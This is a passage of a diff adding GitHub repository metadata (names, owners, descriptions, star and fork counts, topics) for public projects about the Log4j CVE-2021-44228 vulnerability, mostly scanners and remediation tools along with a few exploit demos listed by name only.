"https:\/\/github.com\/perryflynn\/find-log4j", + "description": "Find log4j for CVE-2021-44228 on some places * Log4Shell", + "fork": false, + "created_at": "2021-12-13T22:26:04Z", + "updated_at": "2021-12-21T07:48:29Z", + "pushed_at": "2021-12-14T21:11:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4j2", + "log4jshell" + ], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438090697, + "name": "log4j-cve-2021-44228-sample", + "full_name": "alpacamybags118\/log4j-cve-2021-44228-sample", + "owner": { + "login": "alpacamybags118", + "id": 16386559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16386559?v=4", + "html_url": "https:\/\/github.com\/alpacamybags118", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alpacamybags118\/log4j-cve-2021-44228-sample", + "description": "Sample docker-compose setup to show how this exploit works", + "fork": false, + "created_at": "2021-12-14T02:26:52Z", + "updated_at": "2022-11-21T21:14:16Z", + "pushed_at": "2022-01-14T14:13:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438090719, + "name": "log4j2-issue-check", + "full_name": "sandarenu\/log4j2-issue-check", + "owner": { + "login": "sandarenu", + "id": 808954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/808954?v=4", + "html_url": "https:\/\/github.com\/sandarenu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sandarenu\/log4j2-issue-check", + "description": "Demo project to evaluate Log4j2 Vulnerability | CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T02:26:56Z", + "updated_at": "2021-12-14T03:53:41Z", + "pushed_at": "2021-12-14T03:53:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438112808, + "name": "CVE-2021-44228-Demo", + "full_name": "roticagas\/CVE-2021-44228-Demo", + "owner": { + "login": "roticagas", + "id": 17757134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17757134?v=4", + "html_url": "https:\/\/github.com\/roticagas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/roticagas\/CVE-2021-44228-Demo", + "description": null, + "fork": false, + "created_at": "2021-12-14T04:09:02Z", + "updated_at": "2021-12-15T07:13:10Z", + "pushed_at": "2021-12-15T07:13:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438118026, + "name": "log4j-urlscanner", + "full_name": "Woahd\/log4j-urlscanner", + "owner": { + "login": "Woahd", + "id": 91861246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91861246?v=4", + "html_url": "https:\/\/github.com\/Woahd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Woahd\/log4j-urlscanner", + "description": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading", + "fork": false, + "created_at": "2021-12-14T04:35:20Z", + "updated_at": "2021-12-15T04:54:26Z", + "pushed_at": "2021-12-15T04:54:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438128189, + "name": "Log4j2-CVE-2021-44228-revshell", + "full_name": "faisalfs10x\/Log4j2-CVE-2021-44228-revshell", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/Log4j2-CVE-2021-44228-revshell", + "description": "Log4j2 CVE-2021-44228 revshell, ofc it suck!!", + "fork": false, + "created_at": "2021-12-14T05:24:52Z", + "updated_at": "2024-07-31T09:38:34Z", + "pushed_at": "2021-12-21T19:48:57Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "log4j", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438135281, + "name": "chk_log4j", + "full_name": "gcmurphy\/chk_log4j", + "owner": { + "login": "gcmurphy", + "id": 222833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/222833?v=4", + "html_url": "https:\/\/github.com\/gcmurphy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gcmurphy\/chk_log4j", + "description": "Some siimple checks to see if JAR file is vulnerable to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T05:58:28Z", + "updated_at": "2023-03-08T02:33:19Z", + "pushed_at": "2021-12-14T12:20:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "jar", + "log4j", + "log4shell", + "rust" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438144746, + "name": "LogMePwn", + "full_name": "0xInfection\/LogMePwn", + "owner": { + "login": "0xInfection", + "id": 39941993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39941993?v=4", + "html_url": "https:\/\/github.com\/0xInfection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xInfection\/LogMePwn", + "description": "A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.", + "fork": false, + "created_at": "2021-12-14T06:37:59Z", + "updated_at": "2024-11-16T19:51:31Z", + "pushed_at": "2024-04-24T05:35:26Z", + "stargazers_count": 386, + "watchers_count": 386, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "internet-scanning", + "log4j", + "rce-scanner", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 52, + "watchers": 386, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 438148080, + "name": "apache-solr-log4j-CVE-2021-44228", + "full_name": "toramanemre\/apache-solr-log4j-CVE-2021-44228", + "owner": { + "login": "toramanemre", + "id": 24626967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24626967?v=4", + "html_url": "https:\/\/github.com\/toramanemre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toramanemre\/apache-solr-log4j-CVE-2021-44228", + "description": "A Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T06:51:30Z", + "updated_at": "2023-07-28T09:59:43Z", + "pushed_at": "2021-12-14T06:51:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438165990, + "name": "log4j-scanner", + "full_name": "codiobert\/log4j-scanner", + "owner": { + "login": "codiobert", + "id": 10519412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10519412?v=4", + "html_url": "https:\/\/github.com\/codiobert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codiobert\/log4j-scanner", + "description": "Check CVE-2021-44228 vulnerability", + "fork": false, + "created_at": "2021-12-14T07:59:14Z", + "updated_at": "2022-01-30T16:35:24Z", + "pushed_at": "2021-12-15T17:08:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438175327, + "name": "log4j2-rce-recap", + "full_name": "cbuschka\/log4j2-rce-recap", + "owner": { + "login": "cbuschka", + "id": 5462513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5462513?v=4", + "html_url": "https:\/\/github.com\/cbuschka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbuschka\/log4j2-rce-recap", + "description": "Little recap of the log4j2 remote code execution (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-14T08:31:47Z", + "updated_at": "2021-12-14T10:06:36Z", + "pushed_at": "2021-12-14T10:03:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "java", + "log4j2", + "rce", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438182253, + "name": "log4j-vulnerability-demo", + "full_name": "andrii-kovalenko-celonis\/log4j-vulnerability-demo", + "owner": { + "login": "andrii-kovalenko-celonis", + "id": 63106217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63106217?v=4", + "html_url": "https:\/\/github.com\/andrii-kovalenko-celonis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andrii-kovalenko-celonis\/log4j-vulnerability-demo", + "description": "Endpoint to test CVE-2021-44228 – Log4j 2", + "fork": false, + "created_at": "2021-12-14T08:55:43Z", + "updated_at": "2021-12-14T08:57:36Z", + "pushed_at": "2021-12-14T08:57:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438193673, + "name": "Log4j-CVE-2021-44228", + "full_name": "dark-ninja10\/Log4j-CVE-2021-44228", + "owner": { + "login": "dark-ninja10", + "id": 58605984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58605984?v=4", + "html_url": "https:\/\/github.com\/dark-ninja10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dark-ninja10\/Log4j-CVE-2021-44228", + "description": "On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it \"Log4Shell\" for short.", + "fork": false, + "created_at": "2021-12-14T09:33:22Z", + "updated_at": "2021-12-14T09:35:51Z", + "pushed_at": "2021-12-14T09:35:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438203240, + "name": "log4j-finder", + "full_name": "fox-it\/log4j-finder", + "owner": { + "login": "fox-it", + "id": 468621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/468621?v=4", + "html_url": "https:\/\/github.com\/fox-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fox-it\/log4j-finder", + "description": "Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)", + "fork": false, + "created_at": "2021-12-14T10:04:42Z", + "updated_at": "2024-10-03T05:15:58Z", + "pushed_at": "2022-12-27T17:57:19Z", + "stargazers_count": 435, + "watchers_count": 435, + "has_discussions": true, + "forks_count": 97, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "cve-2021-45105", + "log4j", + "log4j-finder", + "log4j2", + "log4shell", + "python" + ], + "visibility": "public", + "forks": 97, + "watchers": 435, + "score": 0, + "subscribers_count": 21 + }, + { + "id": 438248880, + "name": "JNDI-Exploit-1.2-log4shell", + "full_name": "34zY\/JNDI-Exploit-1.2-log4shell", + "owner": { + "login": "34zY", + "id": 55347142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4", + "html_url": "https:\/\/github.com\/34zY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34zY\/JNDI-Exploit-1.2-log4shell", + "description": "Details : CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T12:42:54Z", + "updated_at": "2024-08-12T20:18:53Z", + "pushed_at": "2021-12-19T07:57:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438250402, + "name": "cve-2021-44228", + "full_name": "didoatanasov\/cve-2021-44228", + "owner": { + "login": "didoatanasov", + "id": 7069625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7069625?v=4", + "html_url": "https:\/\/github.com\/didoatanasov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/didoatanasov\/cve-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-14T12:47:56Z", + "updated_at": "2021-12-14T14:30:02Z", + "pushed_at": "2021-12-14T14:29:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438289849, + "name": "Security-Log4J-Tester", + "full_name": "ReynerGonzalez\/Security-Log4J-Tester", + "owner": { + "login": "ReynerGonzalez", + "id": 51517256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51517256?v=4", + "html_url": "https:\/\/github.com\/ReynerGonzalez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReynerGonzalez\/Security-Log4J-Tester", + "description": "The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell.", + "fork": false, + "created_at": "2021-12-14T14:46:08Z", + "updated_at": "2021-12-14T15:04:49Z", + "pushed_at": "2021-12-14T15:04:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438291572, + "name": "org.shaneking.demo.cve.y2021.s44228", + "full_name": "ShaneKingBlog\/org.shaneking.demo.cve.y2021.s44228", + "owner": { + "login": "ShaneKingBlog", + "id": 76613703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76613703?v=4", + "html_url": "https:\/\/github.com\/ShaneKingBlog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaneKingBlog\/org.shaneking.demo.cve.y2021.s44228", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T14:51:26Z", + "updated_at": "2021-12-14T18:03:52Z", + "pushed_at": "2021-12-14T18:03:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438299030, + "name": "log4j", + "full_name": "wortell\/log4j", + "owner": { + "login": "wortell", + "id": 54625905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54625905?v=4", + "html_url": "https:\/\/github.com\/wortell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wortell\/log4j", + "description": "Repo containing all info, scripts, etc. related to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T15:13:06Z", + "updated_at": "2024-03-21T04:34:22Z", + "pushed_at": "2021-12-29T19:46:22Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 438349219, + "name": "CVE-2021-44228-Scanner", + "full_name": "municipalparkingservices\/CVE-2021-44228-Scanner", + "owner": { + "login": "municipalparkingservices", + "id": 3780687, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3780687?v=4", + "html_url": "https:\/\/github.com\/municipalparkingservices", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/municipalparkingservices\/CVE-2021-44228-Scanner", + "description": null, + "fork": false, + "created_at": "2021-12-14T17:53:37Z", + "updated_at": "2021-12-14T17:58:15Z", + "pushed_at": "2021-12-14T17:54:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 438353510, + "name": "log4j-honeypot-flask", + "full_name": "BinaryDefense\/log4j-honeypot-flask", + "owner": { + "login": "BinaryDefense", + "id": 10130449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10130449?v=4", + "html_url": "https:\/\/github.com\/BinaryDefense", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BinaryDefense\/log4j-honeypot-flask", + "description": "Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T18:08:45Z", + "updated_at": "2024-10-14T22:09:15Z", + "pushed_at": "2021-12-20T14:44:27Z", + "stargazers_count": 148, + "watchers_count": 148, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 148, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 438369987, + "name": "Log4jTools", + "full_name": "MalwareTech\/Log4jTools", + "owner": { + "login": "MalwareTech", + "id": 7256561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4", + "html_url": "https:\/\/github.com\/MalwareTech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalwareTech\/Log4jTools", + "description": "Tools for investigating Log4j CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T19:08:14Z", + "updated_at": "2024-09-06T00:15:26Z", + "pushed_at": "2021-12-23T21:03:08Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 94, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 438375603, + "name": "log4jail", + "full_name": "mufeedvh\/log4jail", + "owner": { + "login": "mufeedvh", + "id": 26198477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26198477?v=4", + "html_url": "https:\/\/github.com\/mufeedvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mufeedvh\/log4jail", + "description": "A firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.", + "fork": false, + "created_at": "2021-12-14T19:29:11Z", + "updated_at": "2023-06-30T21:38:46Z", + "pushed_at": "2021-12-14T21:14:33Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 24, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 438390351, + "name": "log4shellpoc", + "full_name": "guerzon\/log4shellpoc", + "owner": { + "login": "guerzon", + "id": 44284609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44284609?v=4", + "html_url": "https:\/\/github.com\/guerzon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guerzon\/log4shellpoc", + "description": "Simple Spring Boot application vulnerable to CVE-2021-44228 (a.k.a log4shell)", + "fork": false, + "created_at": "2021-12-14T20:27:26Z", + "updated_at": "2023-02-21T10:56:02Z", + "pushed_at": "2021-12-17T23:47:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "jndi-exploit", + "log4j", + "log4j2", + "penetration-testing", + "proof-of-concept" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438406090, + "name": "CVE-2021-44228_PoC", + "full_name": "ab0x90\/CVE-2021-44228_PoC", + "owner": { + "login": "ab0x90", + "id": 36925640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36925640?v=4", + "html_url": "https:\/\/github.com\/ab0x90", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ab0x90\/CVE-2021-44228_PoC", + "description": null, + "fork": false, + "created_at": "2021-12-14T21:32:42Z", + "updated_at": "2024-11-23T23:28:52Z", + "pushed_at": "2021-12-15T11:23:38Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438409343, + "name": "log4j-remediation-tools", + "full_name": "stripe\/log4j-remediation-tools", + "owner": { + "login": "stripe", + "id": 856813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/856813?v=4", + "html_url": "https:\/\/github.com\/stripe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stripe\/log4j-remediation-tools", + "description": "Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-14T21:47:04Z", + "updated_at": "2024-08-18T16:13:22Z", + "pushed_at": "2023-03-21T09:51:33Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4j2", + "remediation", + "tools" + ], + "visibility": "public", + "forks": 9, + "watchers": 41, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 438417506, + "name": "log4jshield", + "full_name": "xsultan\/log4jshield", + "owner": { + "login": "xsultan", + "id": 231387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/231387?v=4", + "html_url": "https:\/\/github.com\/xsultan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsultan\/log4jshield", + "description": "Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher", + "fork": false, + "created_at": "2021-12-14T22:22:15Z", + "updated_at": "2024-11-12T15:10:01Z", + "pushed_at": "2021-12-23T04:50:38Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "cve-2021-45046", + "log4j", + "log4j2", + "log4shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438418716, + "name": "log4shell-finder", + "full_name": "HynekPetrak\/log4shell-finder", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/log4shell-finder", + "description": "Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.", + "fork": false, + "created_at": "2021-12-14T22:27:14Z", + "updated_at": "2024-09-10T05:00:03Z", + "pushed_at": "2023-06-21T11:37:03Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5645", + "cve-2019-17571", + "cve-2020-9488", + "cve-2021-4104", + "cve-2021-42550", + "cve-2021-44228", + "cve-2021-44832", + "cve-2021-45046", + "cve-2021-45105", + "cve-2022-23302", + "cve-2022-23305", + "cve-2022-23307", + "log4j", + "log4j2", + "log4shell", + "scanner", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 38, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 438423480, + "name": "CVE-2021-44228", + "full_name": "0xThiebaut\/CVE-2021-44228", + "owner": { + "login": "0xThiebaut", + "id": 46688461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46688461?v=4", + "html_url": "https:\/\/github.com\/0xThiebaut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xThiebaut\/CVE-2021-44228", + "description": "CVE-2021-44228 Response Scripts", + "fork": false, + "created_at": "2021-12-14T22:50:05Z", + "updated_at": "2021-12-15T00:30:22Z", + "pushed_at": "2021-12-15T00:27:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438432868, + "name": "CVE-2021-44228_scanner", + "full_name": "CERTCC\/CVE-2021-44228_scanner", + "owner": { + "login": "CERTCC", + "id": 37221555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37221555?v=4", + "html_url": "https:\/\/github.com\/CERTCC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTCC\/CVE-2021-44228_scanner", + "description": "Scanners for Jar files that may be vulnerable to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-14T23:33:51Z", + "updated_at": "2024-10-15T07:29:40Z", + "pushed_at": "2022-03-23T18:12:51Z", + "stargazers_count": 344, + "watchers_count": 344, + "has_discussions": false, + "forks_count": 87, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 87, + "watchers": 344, + "score": 0, + "subscribers_count": 35 + }, + { + "id": 438449548, + "name": "CVE-2021-44228-Log4j-Payloads", + "full_name": "CrackerCat\/CVE-2021-44228-Log4j-Payloads", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-44228-Log4j-Payloads", + "description": null, + "fork": false, + "created_at": "2021-12-15T00:55:12Z", + "updated_at": "2023-08-15T12:50:50Z", + "pushed_at": "2021-12-14T12:49:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 438469082, + "name": "log4j_scanner", + "full_name": "dbzoo\/log4j_scanner", + "owner": { + "login": "dbzoo", + "id": 1550399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1550399?v=4", + "html_url": "https:\/\/github.com\/dbzoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbzoo\/log4j_scanner", + "description": "Fast filesystem scanner for CVE-2021-44228", + "fork": false, + "created_at": "2021-12-15T02:29:34Z", + "updated_at": "2022-01-09T18:17:10Z", + "pushed_at": "2022-01-10T14:52:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 438469428, + "name": "CVE-2021-44228_scanner", + "full_name": "jeremyrsellars\/CVE-2021-44228_scanner", + "owner": { + "login": "jeremyrsellars", + "id": 1396319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1396319?v=4", + "html_url": "https:\/\/github.com\/jeremyrsellars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeremyrsellars\/CVE-2021-44228_scanner", + "description": "Aims to find JndiLookup.class in nearly any directory or zip, jar, ear, war file, even deeply nested.", + "fork": false, + "created_at": "2021-12-15T02:31:14Z", + "updated_at": "2021-12-15T22:30:35Z", + "pushed_at": "2021-12-15T22:30:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438480170, + "name": 